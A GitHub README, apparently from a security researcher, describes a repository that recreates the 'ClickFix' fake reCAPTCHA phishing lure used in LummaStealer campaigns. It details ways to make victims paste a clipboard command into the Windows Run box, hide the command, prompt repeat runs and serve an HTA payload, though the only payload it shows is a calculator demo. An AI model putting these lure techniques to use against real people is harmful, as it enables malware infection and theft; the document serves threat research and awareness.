Skip to content

Latest commit

 

History

History
68 lines (38 loc) · 4.21 KB

README.md

File metadata and controls

68 lines (38 loc) · 4.21 KB

reCAPTCHA Phish

John Hammond | September 13, 2024


Verify You Are Human

This is small harness to recreate the social engineering and phishing lure recently seen in the wild around August/September 2024.

🪝 The Lure In The Wild

Originally seen with the guise "Verify you are human", the attack vector being copy and paste.

It literally instructs the user to open the Windows Run dialog box with the hotkey Win+R, and have them paste in a malicious command with Ctrl+V that the web browser has premptively copied into their clipboard.

Verification Steps

Despite this being... dumb... sure, it probably works. 😅

Following some chatter on Twitter, these are apparently called "ClickFix", or Emmenhtal, used in LummaStealer campaigns observed by Unit42, Orange Cyberdefense, Huntress, and others.

Tonmoy Jitu also wrote a sweet article covering the original lure. 🔥


🎨 Recreation

Caution

The code is bad because I am a bad programmer.

Considering the original is meant to emulate a reCAPTCHA form, I thought this "tradecraft" (if you dare to call it that) could be improved. 😈

Why not make it look as close to the real reCAPTCHA button as possible?

reCAPTCHA

New Steps

This repository includes some of my code playing with that idea.

Really all you need is index.html. It includes the CSS and JavaScript in a single file for ease of use, but might need further customization to change the command that is ran (see the JavaScript at the end of the showVerifyWindow function). This can be used as a standalone file and a run any local command, but to get a bit more flexibility with code execution, this repository includes a sample HTA file recaptcha-verify for an innocent proof of concept of popping open the Windows calculator application. This secondary HTA file would mean it needs to be hosted server-side, or have some other backing infrastructure to offer the payload.

For quick local testing, I literally just used python -m http.server 8000.

The HTA file also gives you an opportunity for more convincing charade, too, potentially with a window that pops up to "try and connect to the reCAPTCHA servers", but state that it fails and prompt the user to do it all over again. 🤪 (Extra callbacks, anybody?)

Fail to connect

So this recreation has some extra perks:

  • Looks and feels like "real" reCAPTCHA (image from the official Google site)
  • Validation in the Run box to "hide" the command (✅ "I am not a robot - reCAPTCHA Verification ID: 7624")
  • Disabled "Verify" button to further encourage users to complete the copy-paste steps. 🚫
  • Fleshed out phish with the follow-up windows "failed to verify"
  • Clears the clipboard so the payload command is removed.

Some code is reused from https://github.com/75a/fake-captcha


🤔 Other Musings

  • Perhaps this could be used within an iframe element, or easily embedded as a widget anywhere.
  • Perhaps this could have a bit more server-side control to check the client's user-agent and do things differently, or adjust the payload appropriately.
  • Perhaps this could be transformed into an easy Github Pages or Vercel tidbit to readily have a public domain and easy tooling

Also, EdyUkAYshuNaL PoRpoiSes only!!!11 🐬